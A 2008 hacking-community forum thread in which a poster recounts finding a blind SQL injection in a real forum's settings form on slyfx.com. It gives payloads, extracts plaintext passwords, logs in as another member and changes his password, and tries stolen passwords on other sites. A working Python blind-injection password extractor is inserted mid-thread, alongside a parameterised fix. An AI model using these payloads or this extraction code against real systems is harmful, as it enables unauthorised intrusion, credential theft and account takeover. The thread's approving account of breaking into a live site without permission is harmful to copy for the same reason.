Posted by unknown user, 10.01.2008 21:06:42

Yeah, it's pretty hard to come up with targets that are noteworthy, but let's take the first real link from http://bright-shadows.net/link.php: the first is meta, the second is down, the 3rd is hackquest ... been there, the 4th is slyfx ... so here we go.

How does the site work? With some CGI scripts that take GET parameters. Presumably they run them through something like | tr -d -c '0123456789', so those GET parameters are rock solid. Luckily for us, there are also POST variables: the message board (for level 1) at http://www.slyfx.com/cgi-bin/wb.cgi?board=1 and the configuration for the forum at http://www.slyfx.com/cgi-bin/wb.cgi?action=options&board=1 ... wiii, POST values.

We mess around a bit, and we notice these are the POST values:

radiobutton=0&radiobutton2=0&select=1&action=options&board=1&Submit=Apply

And what do you know, if you enter some garbage as "select":

Database Error
There has been an error in executing a database command. This error has been logged.
[ EXECUTE :: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6666'' at line 1 ]

It's quite easy to guess that this is the SQL that is throwing the error:

UPDATE some_table set something=$_POST[radiobutton], somethingelse=$_POST[radiobutton2], numberofthreads=$_POST[select] where uid=6666

So it's trivial to send this as $_POST[select]:

4' where uid = '6666' and 1 = 1/*
4' where uid = '6666' and 1 = 2/*

(Make sure to URL-encode the = signs when you use Live HTTP Headers.) Depending on whether or not the change occurs (you can check that by looking at the settings page again), you have a blind SQL injection. Tada ...

Note: you have to change the digit at the start in order to do multiple queries, because you can only see if a change occurs if that number is actually different from the current setting ... There is a users table, don't have too much fun ...

Quote: Lost or forgotten your password? Use this form to get it emailed back to you.

I wonder if they store it in plain text ... do let me know.

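The blind injection described in the post above, reconstructed as an added Python example (this is not code from the thread or from the slyfx script): an in-memory SQLite stand-in for the forum's database, the guessed string-concatenated UPDATE, the boolean oracle that flips numberofthreads only when the injected condition is true, a character-by-character extraction of a stored plaintext password through that oracle, and a parameterised, integer-validated handler that refuses the payload. The settings and users tables, their column names, the second user, both passwords and the candidate charset are constructed assumptions; the real wb.cgi schema is not on the page.

```python
import sqlite3

# Constructed stand-in for the forum's database. Table and column names, the
# users and their passwords are assumptions; the real wb.cgi schema is not on
# the page. Passwords are stored in plain text, as the thread reports.
SCHEMA = """
CREATE TABLE settings (uid INTEGER PRIMARY KEY, radiobutton INTEGER,
                       radiobutton2 INTEGER, numberofthreads INTEGER);
CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO settings VALUES (6666, 0, 0, 1), (7777, 1, 1, 3);
INSERT INTO users VALUES (6666, 'rhican', 'Qx9#mz'), (7777, 'Erik', 'Pa55w0rd!');
"""

# Candidate characters for extraction (assumption). No quote or backslash,
# those would break the payload itself.
CHARSET = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
           "0123456789!#$@_-")

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def update_options_vulnerable(conn, uid, radiobutton, radiobutton2, select):
    """Guessed shape of the original options handler: every POST value is
    pasted into the SQL string, so a quote in `select` ends the literal."""
    sql = ("UPDATE settings SET radiobutton='%s', radiobutton2='%s', "
           "numberofthreads='%s' WHERE uid='%s'"
           % (radiobutton, radiobutton2, select, uid))
    conn.execute(sql)
    conn.commit()

def update_options_fixed(conn, uid, radiobutton, radiobutton2, select):
    """Hardened handler: values travel as bound parameters, and fields that
    must be integers are converted first, so the payload raises ValueError."""
    params = [int(v) for v in (radiobutton, radiobutton2, select, uid)]
    conn.execute("UPDATE settings SET radiobutton=?, radiobutton2=?, "
                 "numberofthreads=? WHERE uid=?", params)
    conn.commit()

def current_threads(conn, uid):
    """What the attacker sees by reloading the settings page."""
    return conn.execute("SELECT numberofthreads FROM settings WHERE uid=?",
                        (uid,)).fetchone()[0]

def blind_oracle(conn, uid, condition):
    """One boolean probe. The marker must differ from the stored value,
    otherwise a true condition is indistinguishable from a false one (the
    post's note about changing the leading digit). Everything after the
    injected WHERE is hidden behind /*, which runs to end of input."""
    before = current_threads(conn, uid)
    marker = before + 1
    payload = "%d' WHERE uid='%d' AND %s/*" % (marker, uid, condition)
    update_options_vulnerable(conn, uid, 0, 0, payload)
    return current_threads(conn, uid) == marker

def extract_password(conn, uid, victim, max_len=32):
    """Recover a plaintext password from the users table one character at a
    time through the oracle: first confirm position `pos` exists, then try
    each candidate character. '?' marks a character outside CHARSET."""
    secret = "(SELECT password FROM users WHERE name='%s')" % victim
    recovered = ""
    for pos in range(1, max_len + 1):
        if not blind_oracle(conn, uid, "length(%s)>=%d" % (secret, pos)):
            break
        for ch in CHARSET:
            if blind_oracle(conn, uid, "substr(%s,%d,1)='%s'" % (secret, pos, ch)):
                recovered += ch
                break
        else:
            recovered += "?"
    return recovered

def fixed_rejects_payload(conn):
    """True if the hardened handler refuses the injection payload."""
    try:
        update_options_fixed(conn, 6666, 0, 0, "4' WHERE uid='6666' AND 1=1/*")
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = fresh_db()
    print("1=1 ->", blind_oracle(db, 6666, "1=1"))   # True: the value changed
    print("1=2 ->", blind_oracle(db, 6666, "1=2"))   # False: nothing changed
    print("Erik's password:", extract_password(db, 6666, "Erik"))
    print("fixed handler rejects payload:", fixed_rejects_payload(fresh_db()))
```

Two caveats when carrying this over to the MySQL the original ran on: under MySQL's default collations `=` compares case-insensitively, so a real substr probe has to compare against BINARY (or test ASCII() values) to tell 'p' from 'P'; and the probe is destructive, it rewrites the attacker's own settings row on every true answer, which is exactly why the post picks the attacker's own uid and a value that differs from the current one.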
Posted by unknown user, 10.01.2008 21:16:26

Hmz, they store it as plain text, that's pretty weak.

Posted by unknown user, 10.01.2008 22:08:35

Heh, I can log in as Erik over there. I changed his password, just so you can't get it anymore ... but I'm sure it's worthless if he doesn't reuse it. If you can't use the pw reset functionality, Erik, feel free to PM me, or extract your own new pw through the security hole.

PS: Erik's password (although a bit short) was pretty strong. Would have taken a while to brute force ... too bad it wasn't encrypted.

Posted by unknown user, 10.01.2008 22:34:39

Oh rats, even Caesum's password doesn't work on electrica. Pretty weak password though. By now you guys do listen when I say "don't reuse passwords", I'm touched.

PS: Caesum is level 10 over at slyfx though ... wii, I have access to all slyfx levels ...

Posted by unknown user, 11.01.2008 01:44:35

Quote: A) There are four main ways, from getting a rank of 3 or higher in the old site, submitting challenge ideas that are likely to be used, finding bugs or security flaws in the site and informing me about them and last of all sponsoring the site (or paying for some hosting in some form).

Not that I really want tokens ... but it doesn't state informing *only* me. Hah, 'twas fun.

Posted by quangntenemy, 11.01.2008 06:51:52

OMG, it's rhican again! He pwnzored another password of mine. Gotta finish my code for fingerprint authentication soon.

Posted by unknown user, 13.01.2008 04:04:07

As a minor update, they have pulled the vulnerable script offline. Didn't get any tokens though ...

Posted by Erik, 13.01.2008 19:43:36

Hi,

Quote from rhican: Heh, I can log in as Erik over there.

Congrats, well done!

Quote: I changed his password, just so you can't get it anymore ... but I'm sure it's worthless if he doesn't reuse it. If you can't use the pw reset functionality, Erik, feel free to PM me, or extract your own new pw through the security hole. PS: Erik's password (although a bit short) was pretty strong. Would have taken a while to brute force ... too bad it wasn't encrypted.

It must have been long ago that I used to visit this site. I didn't take care of the account. So now it at least had some use at all.

Cu, Erik

Posted by unknown user, 11.02.2008 21:07:55

Haha, good work rhican! You can see the vuln script @ http://slyfx.com/bad_wb.txt

You'll have to excuse the messy code, I was learning Perl at the time. Considering it was my first ever website (written back in 2001), and has had no updates since then, I think it lasted pretty well! Let me know if you find any other flaws in the above code - always interested.

I've disabled all the scripts now; the sign-up hasn't worked for years, so not much point in keeping them live. In fact the last time I logged into the site was 2005 ... I can't be bothered to make a slyfx version 2, so if anyone has any suggestions on what I could use the domain for, let me know.

slyfx.

Posted by theAnswer, 11.02.2008 22:07:24

Ugh, slyfx was one of my first challenge sites, even before TheBlackSheep. I was stuck around level 6/3 or something like that, if I remember correctly ... bye bye